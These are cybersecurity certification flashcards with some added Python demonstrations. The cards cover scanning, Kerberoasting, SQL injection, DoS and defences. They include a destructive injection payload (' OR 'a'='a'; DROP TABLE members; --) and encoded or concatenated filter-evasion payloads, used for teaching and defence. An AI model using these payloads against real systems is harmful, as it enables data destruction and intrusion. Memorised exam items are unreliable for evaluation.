The total number of high, medium, and low-risk vulnerabilities detected throughout the network would NOT be typically included in the detailed documentation for a specific vulnerability, as this information is more relevant to an overall network vulnerability assessment rather than the documentation of a particular vulnerability.

249
Q

A vulnerability with a base metric score of 7…

A

A vulnerability with a base metric score of 7, a temporal metric score of 8, and an environmental metric score of 5, has an overall high severity, the likelihood of exploitability is increasing over time, and it has a medium impact in their specific environment

250
Q

Hybrid Attack

A

In a system hacking scenario where passwords are common words with added numbers, a Hybrid Attack, which combines dictionary and brute-force methods, is most likely to succeed.

251
Q

DLL Hijacking

A

In a scenario where a malicious Dynamic Link Library (DLL) is loaded in the application directory without a fully qualified path, the likely privilege escalation technique used is DLL Hijacking.

252
Q

Man-in-the-middle Attack Using Forged ICMP and ARP Spoofing

A

In network-level session hijacking, inserting a machine between a client and server to reroute packets is indicative of a Man-in-the-middle Attack Using Forged ICMP and ARP Spoofing.

253
Q

dedicated network

A

Using a dedicated network for a smart home system, separate from the home’s main Wi-Fi network, effectively isolates devices, enhancing security by ensuring that if one device is compromised, the rest remain secure.

254
Q

char encoding function

A

Using the char encoding function to convert hexadecimal and decimal values into characters that pass through SQL engine parsing is an effective SQL Injection evasion technique for bypassing signature-based IDS by altering the query format without changing its logic.

255
Q

NTLM password hash

A

Changing the NTLM password hash used to encrypt a ST will invalidate a stolen Ticket Granting Service ticket and prevent the attacker from using it even if they successfully crack it.

256
Q

DNS tunneling

A

Initiating DNS tunneling to communicate with the command-and-control server allows the adversary to hide malicious traffic within legitimate DNS traffic, making it harder to detect and block.

257
Q

service ticket

A

Requesting a service ticket for the service principal name of the target service account is the next step in a Kerberoasting attack after obtaining a valid user authentication ticket (TGT), allowing the analyst to target specific service accounts for password compromise.

258
Q

Internet Service Provider (ISP)

A

Contact your Internet Service Provider (ISP) for assistance, as they can provide immediate support and implement measures like traffic filtering to mitigate a Distributed Denial of Service (DDoS) attack.

259
Q

f=490

A

f=490: The server can handle 490 SYN packets per second. With ‘s’ exceeding ‘f’ by 10, the response time shoots up (2^10 = 1024 times the usual response time), indicating a system overload.

260
Q

‘use_ssl = True’

A

The ‘use_ssl = True’ in the server object creation is necessary for establishing a secure connection with an LDAP server that only accepts secure connections.

261
Q

sophisticated XSS payload

A

Creating a sophisticated XSS payload that leverages HTML encoding to bypass the input sanitization can be used to redirect users to a malicious site where their cookies can be captured, which circumvents the HTTPOnly flag by redirecting users rather than directly accessing the cookies.

262
Q

Default settings

A

Default settings reveal server software type; change these settings, as attackers can exploit known vulnerabilities of specific software types more easily when the default settings that reveal this information are used.

263
Q

cybersecurity awareness training

A

Conduct regular cybersecurity awareness training, focusing on phishing attacks, as it empowers employees to recognize and avoid such threats while maintaining the autonomy granted by a Bring Your Own Device (BYOD) policy.

264
Q

Unauthorized users

A

Unauthorized users may perform privilege escalation using unnecessarily created accounts, as misconfigurations granting administrative permissions to unknown users can lead to unauthorized access and control over the system.

265
Q

Pulse Wave attack

A

A Pulse Wave attack sends high-volume traffic pulses at regular intervals and effectively exhausts network resources and is resistant to simple defensive measures like IP-based blocking.

266
Q

client-side encryption

A

Using client-side encryption and managing encryption keys independently of the CSP ensures that the cloud service provider does not have access to the keys necessary to decrypt the data, thereby securing the data against unauthorized access by the CSP.

267
Q

YARA rules

A

Writing YARA rules specifically to identify goodware files triggering false positives would help an IDS differentiate between actual threats and legitimate files, reducing false positives without compromising threat detection.

268
Q

Ping of Death attack

A

System crashes and instability due to traffic with packet sizes exceeding the prescribed limit is indicative of a Ping of Death attack, which involves sending malformed or oversized packets to crash the target system.

269
Q

network segmentation

A

Implementing network segmentation to separate IIoT devices from the rest of the network reduces the risk of a compromised device affecting the entire network and enhances the overall security of the operational technology environment.

270
Q

vulnerability assessment

A

Conducting a vulnerability assessment specifically for IoT devices will help identify potential security weaknesses in the IoT integration, providing a basis for implementing appropriate protective measures.

271
Q

LM hashes are disabled

A

In Windows Vista or a later version, LM hashes are disabled by default, as these systems no longer store LM hashes to enhance security, resulting in blank entries for LM hashes in the SAM file.

272
Q

principle of least privilege

A

A Zero Trust model operates on the principle of least privilege, verifying each request as if it is from an untrusted source, regardless of its location, thereby providing stringent access control to the cloud resources and enhancing security.

273
Q

Side-Channel Attack

A

Attacks exploiting a hardware vulnerability to induce misprediction of instructions and using observable side effects to infer data values describe a Side-Channel Attack, specifically targeting the speculative execution in processors.

274
Q

server configuration audits

A

Performing regular server configuration audits helps to identify and rectify potential misconfigurations, thereby protecting the web server from attacks that exploit such vulnerabilities.

275
Q

rogue access point

A

A mobile app security feature should prevent the app from communicating over a network if it detects a rogue access point, thereby protecting against man-in-the-middle attacks conducted through rogue Wi-Fi hotspots by halting potentially compromised communications.

276
Q

ARP Ping Scan

A

ARP Ping Scan works within the LAN to discover live hosts, bypassing firewalls that might block other types of pings, like ICMP or TCP.

277
Q

yarGen

A

yarGen generates YARA rules from strings identified in malware files while removing strings that also appear in goodware files, effectively complementing Snort rules in the IDS by enhancing malware detection while minimizing false positives.

278
Q

initial exploitation methods

A

Analyzing initial exploitation methods used by an adversary is most crucial for initial analysis, as understanding how they gained entry will help identify vulnerabilities and prevent similar attacks in the future.

279
Q

Script Kiddies

A

Script Kiddies trying to compromise the system using pre-made scripts create a pattern of automated requests from various locations, indicating the lack of advanced skills typically associated with unskilled hackers using readily available tools.

280
Q

brute force attack

A

Implementing a brute force attack to verify system vulnerability would not assist in detecting a honeypot, as this method does not specifically identify honeypots but rather attempts to exploit potential vulnerabilities.

281
Q

802.1X authentication

A

Implement 802.1X authentication, as it provides a robust framework for network access control, ensuring that each user is individually authenticated, thereby reducing the risk of unauthorized access due to shared login credentials.

282
Q

Encrypting data

A

Encrypting data client-side before uploading to the cloud and retaining control of the encryption keys ensures that the client maintains complete control over the encryption process and the keys, complying with their regulatory requirements.

283
Q

Shoulder surfing

A

Shoulder surfing is not likely to yield beneficial information based on collected Internet infrastructure details (domains, DNS names, Netblocks, IP address information), as it requires physical proximity and does not directly relate to the digital data gathered.

284
Q

WPA2 or WPA3 encryption

A

Enabling WPA2 or WPA3 encryption on the wireless router provides strong security by encrypting data transmitted over the network, ensuring the network is secure from potential attacks.

285
Q

minimize the attack surface

A

Unnecessary services could contain vulnerabilities - Always minimize the attack surface, as reducing the number of running services decreases potential entry points for attackers, enhancing the overall security of the web server.

286
Q

updating and patching

A

Regularly updating and patching the server software is crucial for security, ensuring that vulnerabilities are addressed promptly and the server is secure from common threats.

287
Q

network scanning and monitoring tools

A

Implementing network scanning and monitoring tools can help detect and analyze unauthorized sniffing activities on the network, thereby enhancing the ability to respond to and mitigate these security threats.

288
Q

Diffie-Hellman

A

Implementing the Diffie-Hellman protocol for secure key exchange allows two parties to securely exchange cryptographic keys over an unsecured communication channel, making it suitable for managing and distributing symmetric keys.

289
Q

blind injection

A

Utilizing a blind injection technique that uses time delays or error signatures to extract information can infer database details when explicit error messages are not available, by observing the behavior of the application to different inputs.

290
Q

the ‘-a’ option

A

Hping3 uses the ‘-a’ option to spoof the source IP address, enabling the attacker to conduct the scan while maintaining anonymity.

291
Q

comprehensive approach

A

Using Hping3 for an ICMP ping scan, Nmap for a SYN scan, and Metasploit to exploit identified vulnerabilities provides a comprehensive approach from discovering live hosts to exploiting vulnerabilities.

292
Q

Error-based SQL Injection

A

Detailed error messages like “Incorrect Syntax near…. “, and “Unclosed quotation mark after the character string….” are examples of Error-based SQL Injection

293
Q

comprehensive training sessions

A

Conducting comprehensive training sessions for employees on various social engineering methodologies and the risks associated with revealing confidential data would be successful in preventing an employee from unintentionally divulging information during a phone call.

294
Q

utilize a script

A

To confirm a Cross-Site Scripting vulnerability is present, you may utilize a script hosted on the application’s domain to test forms’ ability to bypass a Content Security Policy (CSP).

295
Q

m=90, b=15

A

m=90, b=15: The server can manage 90 connections per second, but the attacker’s 100 connections exceed this, and with each connection held up for 15 seconds, the attack duration could be significant.

296
Q

string concatenation

A

Leverage string concatenation to break identifiable keywords, as this technique alters the structure of SQL statements in a way that can evade signature-based detection systems while still executing the intended malicious query.

297
Q

anomalies in file movements

A

Investigate for anomalies in file movements or unauthorized data access attempts within your database system, as APTs often involve stealthy data breaches and unusual internal activities, making such investigations critical for confirming and isolating these threats.

298
Q

Cloud Access Security Broker (CASB)

A

Deploying a Cloud Access Security Broker (CASB) provides comprehensive monitoring of cloud resources, real-time threat detection, and ensures consistent enforcement of security policies across all cloud workloads.

299
Q

eMailTrackerPro

A

eMailTrackerPro is designed to track the source and travel path of an email, including time spent reading the email, geolocation, and device type, but not to identify or list all email accounts associated with a domain.

300
Q

external medium

A

Store the potentially malicious program on an external medium, such as a CD-ROM, before analysis on the sheep dip computer, to avoid direct transfer to the isolated system and to maintain the security of the production environment.

301
Q

fix all identified vulnerabilities

A

An organization is at fault if it does not fix all identified vulnerabilities, reflecting a gap in their approach to cybersecurity by prioritizing limited resources over addressing all known risks.

302
Q

Wi-Fi password

A

A long and complex Wi-Fi password is difficult to crack: length and character variety multiply the time and computing power a brute-force attack needs to succeed.

303
Q

Encrypting data

A

Encrypting the data client-side before uploading to the SaaS environment and managing encryption keys independently ensures the data remains private and inaccessible to the cloud service provider or any unauthorized entities.

304
Q

FIN or RST packet

A

Sending a FIN or RST packet to close the connection after it has been successfully opened (as in a TCP connect scan) properly tears down the established connection, which keeps the test within ethical hacking practice and avoids needless resource consumption on the target host.
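The teardown described above, as an added example that is not part of the original card set: a minimal TCP connect probe that completes the three-way handshake and then closes the socket with SO_LINGER set to zero, so the kernel aborts the connection with a single RST instead of a FIN/ACK exchange. The listener and the "closed" port are constructed on the loopback interface for the demonstration; the linger-structure layout (two C ints) is the Linux one.

```python
import socket
import struct


def start_demo_listener(host: str = "127.0.0.1") -> socket.socket:
    """Constructed target: a listening socket on an ephemeral port (the 'open' port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)          # the handshake completes from the backlog, no accept() needed
    return srv


def find_closed_port(host: str = "127.0.0.1") -> int:
    """Constructed 'closed' port: bind and release an ephemeral port so nothing listens on it."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind((host, 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


def connect_probe(host: str, port: int, timeout: float = 0.5, rst_on_close: bool = True) -> str:
    """Full-connect probe of one port. Returns 'open', 'closed' or 'filtered'."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    if rst_on_close:
        # SO_LINGER with l_onoff=1 and l_linger=0 (Linux layout: two ints) makes close()
        # send one RST and discard the connection instead of a graceful FIN/ACK teardown.
        s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack("ii", 1, 0))
    try:
        s.connect((host, port))        # SYN, SYN/ACK, ACK: the connection is fully opened
        return "open"
    except ConnectionRefusedError:
        return "closed"                # the target answered our SYN with RST
    except (socket.timeout, OSError):
        return "filtered"              # no answer in time, or an ICMP unreachable
    finally:
        s.close()                      # RST (linger=0) or FIN (default) goes out here


def scan(host: str, ports) -> dict:
    """Probe several ports and return {port: state}."""
    return {p: connect_probe(host, p) for p in ports}


if __name__ == "__main__":
    srv = start_demo_listener()
    open_port = srv.getsockname()[1]
    print(scan("127.0.0.1", [open_port, find_closed_port()]))
    srv.close()
```

With rst_on_close=False the same probe ends in the normal FIN/ACK close; on the target, the difference is one packet versus four and no TIME_WAIT entry on the scanner side.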

305
Q

WPA2-PSK with AES encryption

A

WPA2-PSK with AES encryption provides a significantly more secure and modern encryption method compared to WEP, greatly enhancing the security of the company’s wireless network.

306
Q

z=600, u=2

A

z=600, u=2: the attacker crafts 2 SQL payloads (u), each aimed at tables holding 600 records (z), affecting all columns across all tables, which yields the largest extracted data volume under the formula E = x · y · z · u.

307
Q

std

A

dnsrecon -t std performs the standard enumeration (std) of the domain given with -d: SOA, NS, A/AAAA, MX and SRV records, giving a comprehensive picture of the domain. Reverse DNS lookups over an IP range are a separate enumeration type (-t rvl with -r <range>), not part of std.

308
Q

UDP Traceroute

A

Use UDP traceroute on Linux (the default probe type of the traceroute command) because it traces the packet’s path without relying on ICMP echo probes, which the target’s firewall may block.

309
Q

TCP SYN Ping Scan

A

A TCP SYN Ping Scan can bypass strict TCP filtering rules by sending SYN packets and analyzing responses, which helps in discovering live hosts even with robust firewall settings.

310
Q

Verify the sender’s identity

A

Verifying the sender’s identity before opening any file received through an instant messenger application can prevent a malicious file from being opened and executed.

311
Q

IPsec

A

Implementing IPsec in addition to SSL/TLS adds per-packet integrity and authentication at the network layer (AH/ESP), so tampering in transit is detected even for traffic that is not carried inside the TLS session.

312
Q

inference-based assessment

A

An inference-based assessment solution simulates an attacker’s perspective, uses automated scans with updated databases, and is adaptable for multiple networks, aligning well with large organization’s requirements.

313
Q

User-directed spidering

A

User-directed spidering with tools like Burp Suite and WebScarab allows manual control over web crawling, enabling the ethical hacker to uncover and explore website elements that standard automated web spiders cannot reach because of specific restrictions.

314
Q

Defense-in-Depth strategy

A

Establishing a Defense-in-Depth strategy incorporating multiple layers of security measures increases the complexity and decreases the likelihood of a successful attack and provides a comprehensive and layered defense against various types of vulnerabilities and threats.

315
Q

Regularly scanning systems

A

Regularly scanning systems for any new files and examining them helps in early detection and removal of suspicious files and attachments, effectively reducing the risk of malware installation from email sources.

316
Q

suppress detailed error messages

A

Always suppress detailed error messages in production: return a generic error page and log the details server-side, because verbose errors expose information about the server’s internal workings that attackers can use.

317
Q

Maimon Scan

A

Maimon Scan is very similar to NULL, FIN, and Xmas scans, but uses FIN/ACK, making it less likely to be detected by network security devices that are set to identify and flag more common scan types like SYN scans.

318
Q

Test 1

A

Test 1: A TCP packet with the SYN and ECN-Echo flags enabled is sent to an open TCP port.

319
Q

h=1987 (prime)

A

h=1987 (prime): the attacker’s packet rate exceeds the server’s capacity, causing potential unresponsiveness, because the rate at which the server can handle packets (h) is lower than the rate at which the attacker sends them (r), creating a risk of server failure.

320
Q

IDLE/IPID header scan

A

Using the IDLE/IPID header scan technique with the command “-sI” allows the attacker to perform a stealthy scan without revealing its IP address.

321
Q

p=175, q=250

A

p=175, q=250: the key size n = p · q is increased by raising both p and q, so the attacker’s decryption effort grows, since a larger n requires more computation to factor, including with Shor’s algorithm on a quantum computer. (Strictly, 175 and 250 are composite, so they can only be placeholder values; RSA requires p and q to be prime.)

322
Q

are open

A

The ports on the target network are open if there is an increase in the IPID number by 2 after an IDLE scan.
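The IP ID arithmetic behind the IDLE/IPID scan (this card and the “-sI” card above), as an added example that is not part of the original card set: a model of the three-step exchange between scanner, zombie and target, and the classifier that turns the zombie’s two observed IP IDs into a port state. No packets are sent; simulate_idle_probe() is a hypothetical stand-in for the real probes, and the 16-bit wrap-around and “busy zombie” cases are handled explicitly.

```python
def ipid_delta(before: int, after: int) -> int:
    """Distance between two 16-bit IP ID values, tolerant of wrap at 65535."""
    return (after - before) & 0xFFFF


def classify_idle_probe(before: int, after: int) -> str:
    """Interpret the zombie's IP ID change across one spoofed SYN to the target."""
    d = ipid_delta(before, after)
    if d == 1:
        return "closed|filtered"   # target sent RST or nothing; the zombie stayed quiet
    if d == 2:
        return "open"              # target sent SYN/ACK; the zombie answered it with RST
    if d == 0:
        return "error"             # the zombie did not answer the second probe
    return "unreliable"            # the zombie sent other traffic; retest or pick another zombie


def zombie_is_usable(observed_ipids) -> bool:
    """Precondition of the technique: the zombie must increment its IP ID by exactly
    one per packet, globally (not per destination and not randomised)."""
    return all(ipid_delta(a, b) == 1 for a, b in zip(observed_ipids, observed_ipids[1:]))


def simulate_idle_probe(zombie_ipid: int, port_open: bool, background_packets: int = 0):
    """Hypothetical model of the exchange; returns the IP IDs the scanner sees in the
    zombie's two RST replies (before and after the spoofed SYN)."""
    ipid = zombie_ipid
    # 1. scanner -> zombie: SYN/ACK; zombie -> scanner: RST (one IP ID consumed)
    ipid = (ipid + 1) & 0xFFFF
    before = ipid
    # 2. scanner -> target: SYN with the zombie's address as source
    #    open port:   target -> zombie SYN/ACK; zombie -> target RST (one IP ID consumed)
    #    closed port: target -> zombie RST; the zombie ignores it (nothing consumed)
    #    filtered:    target sends nothing (nothing consumed)
    if port_open:
        ipid = (ipid + 1) & 0xFFFF
    # unrelated packets the zombie happens to send during the probe
    ipid = (ipid + background_packets) & 0xFFFF
    # 3. scanner -> zombie: SYN/ACK again; zombie -> scanner: RST (one IP ID consumed)
    ipid = (ipid + 1) & 0xFFFF
    after = ipid
    return before, after


if __name__ == "__main__":
    for port_open in (True, False):
        b, a = simulate_idle_probe(1000, port_open)
        print(port_open, b, a, classify_idle_probe(b, a))
```

The classifier cannot tell closed from filtered, which is exactly what nmap reports for -sI; and because the decision rests on a difference of one packet, a zombie that is talking to anyone else during the probe makes the result unreliable, which is why nmap checks the zombie’s IP ID behaviour before scanning with it.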

323
Q

establish a foothold

A

The next logical step in the Cyber Kill Chain Methodology after the “Delivery” stage is Exploitation: the delivered payload is triggered to exploit a vulnerability on the target organization’s system and establish a foothold.

324
Q

Connecting the system

A

Connecting the system used for malware analysis to the production network should be avoided, as it risks spreading the malware and compromising the security of the production environment.

325
Q

' OR 'a'='a'; DROP TABLE members; --

A

' OR 'a'='a'; DROP TABLE members; --: this payload combines manipulation of the WHERE clause (the always-true 'a'='a' condition) with a destructive second statement, causing data loss; it is significantly impactful because it can permanently delete critical data from the database. Note the closing quote after the second 'a': it is what makes the injected statement syntactically valid before the semicolon.

326
Q

snmp-check

A

snmp-check gathers a wide array of information about the target, as this tool is specifically designed for SNMP enumeration and can extract detailed network information without modifying any parameters in the SNMP agent’s MIB.

327
Q

Passive Footprinting followed by Active Footprinting

A

Passive Footprinting first, followed by Active Footprinting, minimizes chances of detection during initial information gathering, providing an initial layer of information before engaging in more intrusive techniques that could alert the target.

328
Q

Metamorphic and Rootkit malware

A

Metamorphic and Rootkit malware embeds itself within system files to avoid detection (a characteristic of rootkits) and changes its code to evade signature-based detection, which is a feature of metamorphic malware.

329
Q

Qualys Vulnerability Management

A

Qualys Vulnerability Management, as it offers comprehensive coverage and visibility across both on-premise and cloud environments, continuous scanning capabilities, and real-time monitoring for changes, making it ideal for hybrid IT infrastructures.

330
Q

atomicity of operations

A

Ensuring atomicity of operations between checking and using data resources, as this approach directly addresses TOC/TOU errors by making sure that the state of a resource does not change between the moment it is checked and the moment it is used, preventing race conditions.
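The check-then-use race described above, as an added example that is not part of the original card set: a reader that checks a file name and then opens it (the TOC/TOU pattern) beside one that opens first with O_NOFOLLOW and then checks the object it actually got via fstat(). The scenario (secret.txt, upload.txt, and the swap that replaces the checked file with a symlink inside the window) is constructed in a temporary directory; `between` is a hook that stands in for whatever runs during the race window. O_NOFOLLOW is assumed to exist (Linux, macOS and other POSIX systems).

```python
import os
import stat
import tempfile


def vulnerable_read(path: str, between=lambda: None) -> bytes:
    """Check the name, then use the name: the classic TOC/TOU pattern."""
    if os.path.islink(path):                 # time of check
        raise PermissionError("symlink rejected")
    between()                                # the race window (another process runs here)
    with open(path, "rb") as f:              # time of use: the name is resolved again
        return f.read()


def atomic_read(path: str, between=lambda: None) -> bytes:
    """Open first, refusing to follow a symlink in the same system call, then check
    the object that was actually opened through its descriptor."""
    between()                                # whatever happens before open() is irrelevant
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)   # OSError (ELOOP) if path is a symlink
    try:
        st = os.fstat(fd)                    # properties of the opened object, not of a name
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("not a regular file")
        return os.read(fd, st.st_size)
    finally:
        os.close(fd)


def demo() -> dict:
    """Constructed scenario: a benign upload.txt is swapped for a symlink to secret.txt
    exactly inside the check/use window."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "secret.txt")
        upload = os.path.join(d, "upload.txt")
        with open(secret, "w") as f:
            f.write("SECRET")

        def reset():                         # restore the benign file between runs
            if os.path.lexists(upload):
                os.remove(upload)
            with open(upload, "w") as f:
                f.write("harmless")

        def swap():                          # the attacker wins the race
            os.remove(upload)
            os.symlink(secret, upload)

        out = {}
        reset()
        out["vulnerable"] = vulnerable_read(upload, swap).decode()      # leaks the secret
        reset()
        out["atomic_no_race"] = atomic_read(upload).decode()            # normal operation
        reset()
        try:
            out["atomic_raced"] = atomic_read(upload, swap).decode()
        except OSError:                      # ELOOP from O_NOFOLLOW: the swap is caught
            out["atomic_raced"] = "refused"
        return out


if __name__ == "__main__":
    print(demo())
```

The same idea applies to os.access() followed by open(): any decision based on a path name can be invalidated before the name is used, so the check must be made on the file descriptor (fstat, fchmod, fchown) after the open, or the open itself must carry the restriction (O_NOFOLLOW, O_EXCL).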

331
Q

RST hijacking

A

RST hijacking is the technique of injecting a spoofed TCP reset packet to terminate a legitimate connection: the attacker sends a reset, with the right addresses, ports and an acceptable sequence number, to one or both parties of an active connection.

332
Q

intrusion detection systems (IDS)

A

By deploying network intrusion detection systems (IDS) across an IoT network, the IDS can monitor the network for suspicious activity, including the early signs of a DDoS attack, and raise alerts that trigger preventive actions to mitigate the attack before it impacts critical services.

333
Q

Probing the IPC share

A

Probing the IPC$ share by attempting to brute-force administrator credentials directly targets the IPC$ share to enumerate possible points of access or vulnerabilities, which is essential for gathering detailed information about network shares and services.

334
Q

Insider attacks

A

Insider attacks involve a high degree of understanding of the organization’s internal processes and systems; they can be prevented, or at least detected early, by implementing robust access control and monitoring.

335
Q

Synthetic Identity Theft

A

Synthetic Identity Theft involves creating a new identity using a combination of real and fabricated information, which the attacker then uses to open bank accounts and receive benefits, making it distinct from other types of identity theft.

336
Q

SYN scan

A

A SYN scan stealthily identifies open ports without fully establishing a connection, as sending an RST packet after receiving a SYN/ACK prevents the completion of the three-way handshake, making the scan less detectable.

337
Q

location:

A

location: This operator finds information for a specific location, making it the least useful for extracting sensitive VPN-related information, as VPN configurations and details are unlikely to be tied to specific geographic locations in searchable content.

338
Q

Encrypting all sensitive data

A

Encrypting all sensitive data stored on a device ensures that even if the device is compromised, sensitive information such as credit card details and personal identification numbers (PINs) remains protected and inaccessible to unauthorized users.

339
Q

Base metric

A

Base metric represents the inherent qualities of a vulnerability, as it measures the fundamental characteristics that are constant over time and across user environments, providing a foundation for the overall CVSS score.

340
Q

compatible with IPv6

A

nbtstat is traditionally used with IPv4; if the company’s network is using IPv6, an enumeration tool compatible with IPv6 is required for effective NetBIOS enumeration.

341
Q

hardware and software misconfigurations

A

Checking for hardware and software misconfigurations to identify any possible loopholes is very important, even with up-to-date systems and trained employees, as misconfigurations can remain a significant source of vulnerabilities in a secure setup.

342
Q

Thin Whois

A

Thin Whois model only provides limited information about the domain, such as the registrar and name servers, requiring further queries to other servers for complete details, which may appear as incomplete data retrieval.

343
Q

bypass the special character filter

A

A hacker may attempt to bypass the special character filter by encoding his malicious input, which could potentially enable him to successfully inject damaging SQL queries, as encoding can help evade filters that are designed to block known attack patterns and special characters.
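Both evasions on this page (splitting keywords by string concatenation, card 296, and encoding input past a special-character filter, this card) and the injected WHERE clause of card 325, as one added example that is not part of the original card set. It runs a naive keyword signature check and a naive metacharacter filter over constructed payloads, shows a hardened check that normalises the input first, and finishes with the real fix: the same lookup built by string concatenation beside a parameterised query, on a constructed in-memory SQLite table. The EXEC('DR'+'OP ...') payload uses MSSQL dynamic-SQL syntax and is there only to show what the signature sees.

```python
import re
import sqlite3
from urllib.parse import unquote

# Naive signature-based detection: keyword sequences matched against the raw parameter.
KEYWORD_SIGNATURES = [r"union\s+select", r"drop\s+table"]
# Naive special-character filter: reject the raw parameter if it contains a metacharacter.
SPECIAL_CHARS = set("'\";")


def naive_keyword_ids(raw: str) -> bool:
    """True if a keyword signature matches the parameter as received."""
    return any(re.search(sig, raw, re.IGNORECASE) for sig in KEYWORD_SIGNATURES)


def naive_special_char_filter(raw: str) -> bool:
    """True if the parameter as received contains a blocked metacharacter."""
    return any(c in SPECIAL_CHARS for c in raw)


def normalise(raw: str) -> str:
    """Undo both evasions before matching: URL-decode (twice, for double encoding) and
    rejoin keywords split by string concatenation ('DR'+'OP' or 'DR'||'OP')."""
    decoded = unquote(unquote(raw))
    return re.sub(r"'\s*(\+|\|\|)\s*'", "", decoded)


def hardened_check(raw: str) -> bool:
    """Apply both filters to the normalised text instead of the raw bytes."""
    text = normalise(raw)
    return naive_keyword_ids(text) or naive_special_char_filter(text)


# Constructed payloads for the demonstration.
PAYLOADS = {
    "plain":        "' OR 'a'='a'; DROP TABLE members; --",   # card 325, caught by both filters
    "concatenated": "1; EXEC('DR'+'OP TABLE members')",       # keyword split: beats the signature
    "url_encoded":  "%27%20OR%20%27a%27%3D%27a",              # ' OR 'a'='a encoded: beats the char filter
    "double_enc":   "%2527%2520OR%2520%2527a%2527%253D%2527a",
}


def evaluate(payloads=PAYLOADS) -> dict:
    """{name: (keyword_ids, special_char_filter, hardened)} for each payload."""
    return {n: (naive_keyword_ids(p), naive_special_char_filter(p), hardened_check(p))
            for n, p in payloads.items()}


def build_members_db() -> sqlite3.Connection:
    """Constructed sample table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)",
                     [("alice", "alice@example.test"), ("bob", "bob@example.test")])
    return conn


def lookup_vulnerable(conn, name: str) -> list:
    """Query text built by string concatenation: the input rewrites the WHERE clause."""
    sql = "SELECT name FROM members WHERE name='" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterised(conn, name: str) -> list:
    """Bound parameter: the input is data, never SQL syntax, so no filter is needed."""
    return [row[0] for row in conn.execute("SELECT name FROM members WHERE name=?", (name,))]


if __name__ == "__main__":
    for name, verdict in evaluate().items():
        print(f"{name:13s} keyword_ids={verdict[0]} char_filter={verdict[1]} hardened={verdict[2]}")
    db = build_members_db()
    print("vulnerable:   ", lookup_vulnerable(db, "' OR 'a'='a"))
    print("parameterised:", lookup_parameterised(db, "' OR 'a'='a"))
```

The normalising filter closes the two gaps shown here and nothing more; new encodings and comment tricks keep appearing, which is why the parameterised query, not the filter, is the control to rely on.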

344
Q

AES key size of 256

A

An AES key size of 256 bits provides a high level of security, which is crucial against a quantum algorithm threat, while maintaining a reasonable balance with performance, as RSA key generation time is primarily influenced by the RSA key size rather than the AES key size.

345
Q

Enforcing a policy

A

Enforcing a policy that only allows app installations from approved corporate app stores directly addresses the risk of malicious app installations by ensuring that only vetted and secure apps can be installed on company-provided devices.

346
Q

ntptrace -n -m 5 [servername/IP_address]

A

When executing ntptrace -n -m 5 [servername/IP_address], the ‘-n’ option avoids DNS resolution for faster results, and ‘-m 5’ limits the maximum number of NTP servers in the trace, making it efficient to understand the NTP hierarchy and server connections.

347
Q

pretexting

A

In pretexting, fraudsters may impersonate executives from financial institutions, telephone companies, and other businesses, which can lead to the disclosure of proprietary project details and, from there, to access to the network.

348
Q

NetBIOS Session Service

A

Exploit the NetBIOS Session Service on TCP port 139 to gain unauthorized access to the file system (SMB shares), which can be used to gather information about an enterprise’s internal network.

349
Q

employ intrusion detection systems

A

After discovering a keylogger, the team should employ intrusion detection systems and regularly update the system software, as these measures can help detect unauthorized programs and vulnerabilities that keyloggers exploit to gain access.

350
Q

Diffie-Hellman protocol

A

Applying the Diffie-Hellman protocol to exchange the symmetric key allows two parties to securely exchange a symmetric key over an insecure channel, which can then be used to encrypt and decrypt sensitive data.
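The exchange described above, as an added example that is not part of the original card set: both sides of a Diffie-Hellman key agreement, the values a passive eavesdropper sees on the wire, derivation of the symmetric key from the shared secret, and the caveat a practitioner needs, that an unauthenticated exchange is defeated by an active man in the middle. The group parameters p=23, g=5 are textbook toy values chosen so the numbers can be followed by hand; a real deployment uses a 2048-bit or larger group from RFC 3526/7919 or an elliptic-curve exchange such as X25519, and authenticates the public values (signatures or certificates).

```python
import hashlib
import secrets

# Toy group (constructed for the illustration). Real code uses standardised groups.
P, G = 23, 5


def dh_public(private: int, p: int = P, g: int = G) -> int:
    """Public value g^private mod p, sent in the clear."""
    return pow(g, private, p)


def dh_shared(peer_public: int, private: int, p: int = P) -> int:
    """Shared secret peer_public^private mod p; rejects degenerate peer values 0, 1, p-1,
    which would force the secret to a value the attacker already knows."""
    if not 1 < peer_public < p - 1:
        raise ValueError("bad peer public value")
    return pow(peer_public, private, p)


def derive_key(shared: int, p: int = P) -> str:
    """Symmetric key = hash of the fixed-width encoding of the shared secret.
    The raw group element is never used as a key directly."""
    width = (p.bit_length() + 7) // 8
    return hashlib.sha256(shared.to_bytes(width, "big")).hexdigest()


def random_private(p: int = P) -> int:
    """Private exponent in 2 .. p-2 from a CSPRNG."""
    return secrets.randbelow(p - 3) + 2


def exchange(a: int, b: int) -> dict:
    """Honest run: Alice holds a, Bob holds b. Returns what the wire shows and both keys."""
    A, B = dh_public(a), dh_public(b)               # the only values transmitted
    alice_key = derive_key(dh_shared(B, a))         # Alice: B^a mod p
    bob_key = derive_key(dh_shared(A, b))           # Bob:   A^b mod p
    return {"wire": (P, G, A, B), "alice_key": alice_key, "bob_key": bob_key}


def mitm_exchange(a: int, b: int, m: int) -> dict:
    """Unauthenticated run with Mallory (m) in the path: she replaces A and B with her
    own public value M, so each victim agrees a key with her instead of with the peer."""
    A, B, M = dh_public(a), dh_public(b), dh_public(m)
    return {
        "alice_key": derive_key(dh_shared(M, a)),         # Alice believes M came from Bob
        "bob_key": derive_key(dh_shared(M, b)),           # Bob believes M came from Alice
        "mallory_with_alice": derive_key(dh_shared(A, m)),
        "mallory_with_bob": derive_key(dh_shared(B, m)),
    }


if __name__ == "__main__":
    honest = exchange(random_private(), random_private())
    print("wire:", honest["wire"], "keys match:", honest["alice_key"] == honest["bob_key"])
    attacked = mitm_exchange(random_private(), random_private(), random_private())
    print("under MITM Alice and Bob share a key:", attacked["alice_key"] == attacked["bob_key"])
```

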